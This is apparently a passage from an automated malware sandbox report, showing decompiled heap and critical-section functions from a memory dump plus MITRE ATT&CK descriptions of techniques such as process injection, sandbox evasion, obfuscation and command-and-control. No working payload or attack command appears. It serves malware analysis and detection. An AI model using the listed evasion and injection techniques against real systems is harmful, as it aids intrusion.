					return E036C88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03610050(_t14);
				}
			}

0x0360ff66
0x0360ff6b
0x00000000
0x0360ff8f
0x00000000
0x0360ff8f

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ed7aca022e4355671432567e7f0f5a0bc5e7bbf2cf7c4d06b9437e8053eb98
Instruction ID: 6625b39fea895b570dc6543f6fb2ae195a9be7248b6fa301110c63e7d6049d8e
Opcode Fuzzy Hash: a3ed7aca022e4355671432567e7f0f5a0bc5e7bbf2cf7c4d06b9437e8053eb98
Instruction Fuzzy Hash: 0FE0DFB420D3449FDB38DF55D241F26779CEB42621F1D809DE0084F681CA61D882C20A

Uniqueness

Uniqueness Score: -1.00%

Function 036AD380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036AD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L035FE8B0(__ecx, _a4, 0xfff);
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x036ad38a
0x036ad39b
0x036ad3b1
0x00000000
0x036ad3b6
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 836d2a7e71b43b4df6240c1e31cc10011ceec0c774dbd109dc6db2b4a92f6d20
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 94E0CD35240704BBDB229E44CC10F657716DB40790F104031FE045EBA0C5719C51DAC4

Uniqueness

Uniqueness Score: -1.00%

Function 036841E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E036841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x36d08f0);
				_t5 = E0364D08C(__ebx, __edi, __esi);
				if( *0x36e87ec == 0) {
					E0360EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x36e87ec == 0) {
						 *0x36e87f0 = 0x36e87ec;
						 *0x36e87ec = 0x36e87ec;
						 *0x36e87e8 = 0x36e87e4;
						 *0x36e87e4 = 0x36e87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L03684248();
				}
				return E0364D0D1(_t5);
			}

0x036841e8
0x036841ea
0x036841ef
0x036841fb
0x03684206
0x0368420b
0x03684216
0x0368421d
0x03684222
0x0368422c
0x03684231
0x03684231
0x03684236
0x0368423d
0x0368423d
0x03684247

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecca665203338007baeaa389e05c8b439811468fcf20e2405d5d64b438dcc465
Instruction ID: 1012b5a9470788d96753843e8ea6d26c25ed8fad22c74ae703f4b9a4a343d09d
Opcode Fuzzy Hash: ecca665203338007baeaa389e05c8b439811468fcf20e2405d5d64b438dcc465
Instruction Fuzzy Hash: 0DF01578951724CECFA1FFA9960878C36A8F748B10F10625ED0008F28DCB345488EF09

Uniqueness

Uniqueness Score: -1.00%

Function 0362A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0362A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x36e67e4 >= 0xa) {
					if(_t5 < 0x36e6800 || _t5 >= 0x36e6900) {
						return L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03610010(0x36e67e0, _t5);
				}
			}

0x0362a190
0x0362a1a6
0x0362a1c2
0x00000000
0x00000000
0x00000000
0x0362a192
0x0362a192
0x0362a19f
0x0362a19f

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c857673ff866e4bed9377f113f0489292414514ad5976b75c6d056a6a54b09fa
Instruction ID: f841027cafc525d145202dfff2e59e19ead419f49be3b7fd5ed76fff08f90c66
Opcode Fuzzy Hash: c857673ff866e4bed9377f113f0489292414514ad5976b75c6d056a6a54b09fa
Instruction Fuzzy Hash: 3ED02E326224041ACB2DEB88C91CB236A23E794720F31480CF1030EAA4EFA0C8ECE50C

Uniqueness

Uniqueness Score: -1.00%

Function 036216E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036216E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03621710(0x36e67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03614620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x036216e8
0x036216ef
0x036216f3
0x036216fe
0x00000000
0x03621700
0x0362170d
0x0362170d
0x036216f2
0x036216f2
0x036216f2
0x036216f2

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948f5d199f019faa0334174307750855474471fc19e560b84e5499de2fabfbcb
Instruction ID: 02f26bebca5a9a603fd9674fe6b57835579630b055d7d27ea70ffde8f27f4a96
Opcode Fuzzy Hash: 948f5d199f019faa0334174307750855474471fc19e560b84e5499de2fabfbcb
Instruction Fuzzy Hash: 7CD0A771105A0052DE2DDB119918B193652DBC1785F3D005CF5175D5C0CFA4CCB2E84C

Uniqueness

Uniqueness Score: -1.00%

Function 036753CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036753CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0360EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x036753ca
0x036753ce
0x036753d9
0x036753de
0x036753e1
0x036753e1
0x036753e6
0x036753f3
0x00000000
0x036753f8
0x036753fb

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 62ac0fd9458bcb2a1b82c3e9743966678f9220b2b0dfa1049d76570beac87b22
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 1EE08236A00B809BCF12EB98CB90F4EB7F9FB85B00F180488A0096F7B0C624AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0360AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0360aab6
0x0360aabb
0x0365a442
0x00000000
0x0365a448
0x0365a454
0x0365a454
0x0360aac1
0x0360aac1
0x0360aac6
0x0360aac6

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 65ab9c549523c96dc7d3164a8d9ebad5f637ad03202815a47cec04d29270d5d5
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 86D0E935352A80CFD61BCB5DC655B1673A8BB44B85FC909E0E941CB762E66CD984CA10

Uniqueness

Uniqueness Score: -1.00%

Function 036235A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036235A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0360EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x036235a1
0x036235a1
0x036235a5
0x036235ab
0x036235ab
0x036235b5
0x00000000
0x036235c1
0x036235b7

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 00bea2ef56191c0b32ce997727bcee192cdb225a13fd0ee180b9b38d5ce6bc33
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 30D0A73D4019909DDB03EB10C3147687B73BB00304F7D105980492D759C33E490BCE04

Uniqueness

Uniqueness Score: -1.00%

Function 035FDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E035FDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03614620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x035fdb4d
0x035fdb54
0x035fdb5f
0x035fdb56
0x035fdb56
0x035fdb5c
0x035fdb5c

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: fa06c6122e563064dca02e2784a7fbe29786deedace9913bbc7034ce8a232fae
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: D9C08C70290B00AEEB229F20CD01F0076B1BB00B45F4800A06300DB0F4DF78D821EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0367A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0367A537(intOrPtr _a4, intOrPtr _a8) {

				return L03618E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0367a553

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 0bece7e77583afbb191471a5b26f06d9c901787c1e7ea897de47398481007c36
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 7BC01236180248BBCB22AF81CC00F067F2AEB94B60F048014BA080B5608632E970EA88

Uniqueness

Uniqueness Score: -1.00%

Function 03613A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03613A1C(intOrPtr _a4) {
				void* _t5;

				return L03614620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x03613a35

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 637dd3a33bbda9c16e0e15b7eddc4781dfc2875378fce3282db3db7077e475c3
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 7BC08C32080248BBC712AE42DC00F017B2AE790B60F040020B6040B5608932EC70D58C

Uniqueness

Uniqueness Score: -1.00%

Function 036076E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036076E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x036076e4
0x00000000
0x036076f8
0x036076fd

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 174f6c84672eb120bcdabafa58f40659529a7a0b9dfcf6a5e3375d0c47708b5a
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: F5C08C752A12805AEB2ED708CF26B2A3654AB08608F4C019CAA020D6E1C368B822C208

Uniqueness

Uniqueness Score: -1.00%

Function 036236CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036236CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x036236d2
0x036236e8
0x036236d4
0x036236e5
0x036236e5

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: d4e091a0fff5905d1ad4adf35f2ed71a5c7033e93f39a36fa38a80ff868014b3
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 51C02BB8160940BBD7169F30CE00F147268F700B21F7C035872204A6F0DE2C9C20D504

Uniqueness

Uniqueness Score: -1.00%

Function 035FAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E035FAD30(intOrPtr _a4) {

				return L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x035fad49

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: ca5f08fde4ed25bee58d2ae6b13e2ffe0223c04e1337821a3308ce6c1c2457a8
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 36C08C33080248BBC712AA45CD00F017B29E790B60F040020F6040A6618932E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 03617D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03617D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x03617d56
0x03617d5b
0x03617d60
0x03617d5d
0x03617d5d
0x03617d5d

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 6d078f7d2c083669afd83c82aaa7ff43c99508dceee6fd9d8206299c0310408b
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: C8B092343019408FCE16DF18C180B1533F8FB48A40B8840D0E400CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 03622ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03622ACB() {
				void* _t5;

				return E0360EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x03622adc

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 8b9fd569dd6c14535a46aa659b61d4306dc3f8b52f13a3ef165b6832f8fccddb
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 9DB01232C11950CFCF06FF40C710B1A7331FB00750F05489490012B970C329AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0368FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0368FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0363CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03685720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03685720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0368fdda
0x0368fde2
0x0368fde5
0x0368fdec
0x0368fdfa
0x0368fdff
0x0368fe0a
0x0368fe0f
0x0368fe17
0x0368fe1e
0x0368fe19
0x0368fe19
0x0368fe19
0x0368fe20
0x0368fe21
0x0368fe22
0x0368fe25
0x0368fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0368FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0368FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0368FE01

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 67ab2b52e57bbe2240ac3025931cf6a9905d4da23e0d044d129fa859f62e2d4d
Instruction ID: ce19004029bfc55be90dd76b39e5dd3ca8c78cb2f47e7b6b9a7639ed006cb35e
Opcode Fuzzy Hash: 67ab2b52e57bbe2240ac3025931cf6a9905d4da23e0d044d129fa859f62e2d4d
Instruction Fuzzy Hash: 6EF0F636200201BFD624AB45EC06F23BB5EEB49730F144319F6285A1E1DA62F86086F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

